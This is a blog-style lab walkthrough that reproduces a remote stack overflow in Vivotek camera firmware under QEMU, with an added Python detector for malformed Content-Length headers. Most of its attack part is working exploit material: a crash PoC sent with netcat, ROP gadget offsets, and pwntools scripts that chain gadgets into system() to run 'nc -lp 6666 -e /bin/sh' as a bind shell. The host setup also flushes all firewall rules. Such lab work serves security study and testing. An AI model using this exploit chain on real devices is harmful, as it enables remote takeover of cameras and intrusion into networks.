Vulnerable files
https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/VIVOTEK/remote_stack_overflow
Other required files
armel kernel, filesystem, arm-gdbserver, initrd.
https://people.debian.org/~aurel32/qemu/armel/
Start qemu-system
qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append "root=/dev/sda1" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic
Run inside the qemu-system guest
ifconfig eth0 192.168.100.2 netmask 255.255.255.0
route add default gw 192.168.100.254
Run on the host
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -F
sudo iptables -X
sudo iptables -t nat -F
sudo iptables -t nat -X
sudo iptables -t mangle -F
sudo iptables -t mangle -X
sudo iptables -P INPUT ACCEPT
sudo iptables -P FORWARD ACCEPT
sudo iptables -P OUTPUT ACCEPT
sudo iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE
sudo iptables -I FORWARD 1 -i tap0 -j ACCEPT
sudo iptables -I FORWARD 1 -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo ifconfig tap0 192.168.100.254 netmask 255.255.255.0
Transfer the files
scp -r squashfs-root/ root@192.168.100.2:/root
Start the program
chmod -R 777 squashfs-root/
chroot ./squashfs-root/ /bin/sh
./usr/sbin/httpd
It does not start. According to the reproduction blog, the firmware obtains its IP address through its hostname, so if the guest's hostname differs from the firmware's hostname it cannot obtain an IP.
/ # hostname
debian-armel
/ # vi ./etc/hosts
./usr/sbin/httpd
Test the PoC
echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | netcat -v 192.168.100.2 80
The program crashes (core dump) as expected.
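From the defender's side, the request above is easy to spot: Content-Length must be digits only (RFC 7230), and a value that is letters or dozens of bytes long is never a legitimate firmware upload. The following is an added example, not code from the original post or from the vulhub project; it parses raw requests (bare LF line endings included, as the PoC uses) and flags a malformed Content-Length. The sample requests and the 10-digit limit are constructed assumptions.

```python
import re

# Constructed sample requests (not captured traffic). The first has the shape of the PoC
# above (letters where Content-Length expects digits); the other two are benign.
SAMPLE_REQUESTS = [
    b"POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:"
    + b"A" * 20 + b"BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n",
    b"POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\r\nContent-Length: 1024\r\n\r\n",
    b"GET /video3.mjpg HTTP/1.0\r\nHost: camera\r\n\r\n",
]

# Assumption: no legitimate firmware upload needs a Content-Length with more digits
# than this, so a longer value is flagged whatever it contains.
MAX_CONTENT_LENGTH_DIGITS = 10
CONTENT_LENGTH_RE = re.compile(rb"^[0-9]+$")  # RFC 7230: Content-Length = 1*DIGIT


def parse_headers(raw):
    """Split a raw request into (request line, {lower-cased name: value}).
    Accepts CRLF and bare LF line endings, since the PoC uses bare LF."""
    head = raw.split(b"\r\n\r\n", 1)[0].split(b"\n\n", 1)[0]
    lines = [ln.rstrip(b"\r") for ln in head.split(b"\n")]
    headers = {}
    for line in lines[1:]:
        if b":" not in line:
            continue  # malformed header line; a strict server would reject the request
        name, value = line.split(b":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def check_request(raw):
    """Return {'path', 'content_length', 'verdict', 'reasons'} for one raw request."""
    request_line, headers = parse_headers(raw)
    parts = request_line.split()
    path = parts[1].decode("latin-1") if len(parts) >= 2 else ""
    reasons, content_length = [], None
    value = headers.get(b"content-length")
    if value is not None:
        if not CONTENT_LENGTH_RE.match(value):
            reasons.append("non-numeric Content-Length value")
        if len(value) > MAX_CONTENT_LENGTH_DIGITS:
            reasons.append("Content-Length value longer than %d bytes" % MAX_CONTENT_LENGTH_DIGITS)
        if not reasons:
            content_length = int(value)
    return {"path": path, "content_length": content_length,
            "verdict": "suspicious" if reasons else "ok", "reasons": reasons}


def scan(requests):
    """Return (path, reasons) for every request that fails the checks."""
    results = [check_request(r) for r in requests]
    return [(r["path"], r["reasons"]) for r in results if r["verdict"] == "suspicious"]
```

Run `scan(SAMPLE_REQUESTS)` to see only the PoC-shaped request reported; the same check works as a pre-filter in front of the camera's web server or over captured requests.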
Debugging with gdb
In the qemu guest:
/ # ./usr/sbin/httpd
sendto() error 2
[debug]add server push uri 3 video3.mjpg
[debug]add server push uri 4 video4.mjpg
[debug] after ini, server_push_uri[0] is /video3.mjpg
[debug] after ini, server_push_uri[1] is /video4.mjpg
AM_ParseConfigFile failed
fopen pid file: No such file or directory
/ # [29/Jan/2024:14:21:37 +0000] boa: server version 1.32.1.10(Boa/0.94.14rc21)
[29/Jan/2024:14:21:37 +0000] boa: starting server pid=2523, port 80
/ # ./arm-gdbserver --attach 192.168.100.254:1234 2523
Attached; pid = 2523
Listening on port 1234
On the host:
gdb-multiarch ./usr/sbin/httpd
pwndbg> set architecture arm
pwndbg> target remote 192.168.100.2:1234
pwndbg> c
The overflow offset works out to 0x33.
NX is enabled on the binary, so shellcode cannot be used.
Use ROPgadget to find the gadgets we need.
Approach
On ARM, function arguments are passed in order in r0, r1, r2, r3, r4,
so we need to get the address of /bin/sh into r0.
ROPgadget --binary ./lib/libuClibc-0.9.33.3-git.so --only "pop|mov"
0x00033100 : pop {r0, pc}    # cannot be used: strncpy stops at the 00 byte in this address
0x00048784 : pop {r1, pc}    # pc here plays the role of ret on x86
0x00016aa4 : mov r0, r1 ; pop {r4, r5, pc}
First confirm where r0 points
from pwn import *

p = remote('192.168.100.2', 80)
libc = ELF('./lib/libc.so.0')
context.log_level = 'debug'
libc_base = 0xb6f2d000
pop_r1 = 0x00048784 + libc_base        # pop {r1, pc}
mov_r0_r1 = 0x00016aa4 + libc_base     # mov r0, r1 ; pop {r4, r5, pc}
system = libc_base + libc.sym['system']
stack = 0xbeffeb60
head = b"POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:"
# padding up to the saved return address, then the gadget chain; the final
# slot is left as filler ('bbbb') so we can check in gdb where r0 ends up pointing
payload = b'b' * (0x00003c - 8) + p32(pop_r1) + p32(stack) + p32(mov_r0_r1) + b'b' * 8 + b'bbbb'
end = b'aaaaaaaaa'
p.sendline(head + payload + end)
p.interactive()
Exploitation
We obtain a shell by running nc to open a listening port and connecting to it.
from pwn import *

p = remote('192.168.100.2', 80)
libc = ELF('./lib/libc.so.0')
context.log_level = 'debug'
libc_base = 0xb6f2d000
pop_r1 = 0x00048784 + libc_base        # pop {r1, pc}
mov_r0_r1 = 0x00016aa4 + libc_base     # mov r0, r1 ; pop {r4, r5, pc}
system = libc_base + libc.sym['system']
stack = 0xbeffeb64                     # address of the command string on the stack
head = b"POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:"
# same chain as the probe above, with the final slot now holding system
payload = b'b' * (0x00003c - 8) + p32(pop_r1) + p32(stack) + p32(mov_r0_r1) + b'b' * 8 + p32(system)
end = b'nc -lp 6666 -e /bin/sh;' + b'\r\n\r\n'
p.sendline(head + payload + end)
Tags: iptables, sudo, r0, r1, libc, CC8160, 192.168, reproduction, Vivotek
From: https://www.cnblogs.com/blonet/p/18322819